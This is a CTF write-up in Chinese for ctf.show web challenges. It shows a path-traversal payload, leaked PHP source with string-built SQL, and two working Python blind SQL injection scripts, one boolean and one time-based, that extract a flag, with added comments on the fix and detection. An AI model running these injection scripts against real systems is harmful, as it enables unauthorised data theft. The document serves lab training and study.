web486

可以扫目录，发现位于上级目录的 flag.php；而 URL 的 action 参数存在任意文件读取漏洞。

payload:index.php?action=../flag

web487

通过 action=../index 查看源码:

<!--?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-03-08 15:43:51
# @Last Modified by: h1xa
# @Last Modified time: 2021-03-08 22:30:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

include('render/render_class.php');
include('render/db_class.php');



$action=$_GET['action'];
if(!isset($action)){
header('location:index.php?action=login');
die();
}

if($action=='check'){
$username=$_GET['username'];
$password=$_GET['password'];
$sql = "select id from user where username = md5('$username') and password=md5('$password') order by id limit 1";
$user=db::select_one($sql);
if($user){
templateUtil::render('index',array('username'=-->

这个没看懂，直接复制了别人的 Python 注入脚本。

import requests
import string

# NOTE(review): boolean-based blind SQL injection against the `check` action of
# the PHP shown above.  That code interpolates the raw `username`/`password`
# GET parameters straight into the query string
# (`... password=md5('$password') ...`), so the `')` at the end of the URL
# below closes the md5() argument and ` or ` appends an attacker-controlled
# condition.  The defensive fix is a prepared statement with bound parameters;
# on the server side this traffic is also easy to recognise: one request per
# candidate character, each carrying `if(`/`substr(`/`%23` in the query string.
# (Indentation was lost in the pasted source and is restored here.)
url="http://b77de2aa-7d2e-4c6e-9b5f-4772a706992a.challenge.ctf.show/index.PHP?action=check&username=admin1&password=1') or "
# Candidate alphabet for every extracted position: digits, lowercase letters and
# the `{-}` delimiters.  A character outside this set never matches, so the
# script simply appends nothing for that position and moves on.
s=string.digits+string.ascii_lowercase+"{-}"
flag=''
for i in range(1,40):  # 1-based position, as MySQL substr() expects; at most 39 chars
    print(i)
    for j in s:
        # The two commented-out templates enumerate table and column names via
        # information_schema; the active one reads one character of flag.flag.
        #data="if((select substr(group_concat(table_name),{0},1) from information_schema.tables where table_schema=database())='{1}',1,0)%23".format(i,j)
        #data="if((select substr(group_concat(column_name),{0},1) from information_schema.columns where table_name='flag')='{1}',1,0)%23".format(i,j)
        data="if((select substr(flag,{0},1) from flag )='{1}',1,0)%23".format(i,j)
        u=url+data
        #print(u)
        r=requests.get(u)
        # Oracle: presumably the success template echoes the supplied username
        # (`admin1`), so "admin" shows up in the body only when the injected
        # condition made the login query return a row — i.e. the guess matched.
        if "admin" in r.text:
            flag+=j
            print(flag)
            break

另一个脚本:

import requests

# NOTE(review): time-based blind variant of the same injection.  Where the
# script above needs a visible difference in the response body, this one makes
# the database sleep(2) when the guessed comparison holds and treats a client
# timeout as "true".  The same root cause (string-built SQL in the `check`
# action) and the same fix (bound parameters) apply; the `sleep(` token in the
# query string is the obvious thing to alert on server-side.
# (Indentation was lost in the pasted source and is restored here.)
url = "http://b77de2aa-7d2e-4c6e-9b5f-4772a706992a.challenge.ctf.show/index.php?action=check&username=yn8rt&password=1') or "

result = ''
i = 0

while True:
    i = i + 1
    # Binary search over printable ASCII (32..126) for the byte at position i.
    head = 32
    tail = 126

    while head < tail:
        mid = (head + tail) >> 1
        payload = f"if(ascii(substr((select flag from flag),{i},1))>{mid},sleep(2),0)+--+"
        try:
            # The 0.5 s timeout is shorter than sleep(2): a raised timeout is
            # read as "byte > mid", a prompt reply as "byte <= mid".  Any other
            # network error lands in the same `except Exception` and is
            # therefore also read as "> mid" — the result is only as reliable
            # as the connection.
            r = requests.get(url + payload, timeout=0.5)
            tail = mid
        except Exception as e:
            head = mid + 1
    # Past the end of the value substr() yields '' and (presumably) ascii('')
    # is 0, so no comparison ever sleeps and head stays at 32; that is taken as
    # the terminator.  A real space (32) inside the value would also stop here.
    if head != 32:
        result += chr(head)
    else:
        break
    # Placed inside the loop so each resolved character is echoed as it is
    # found; the pasted source does not show which level this line sat at.
    print(result)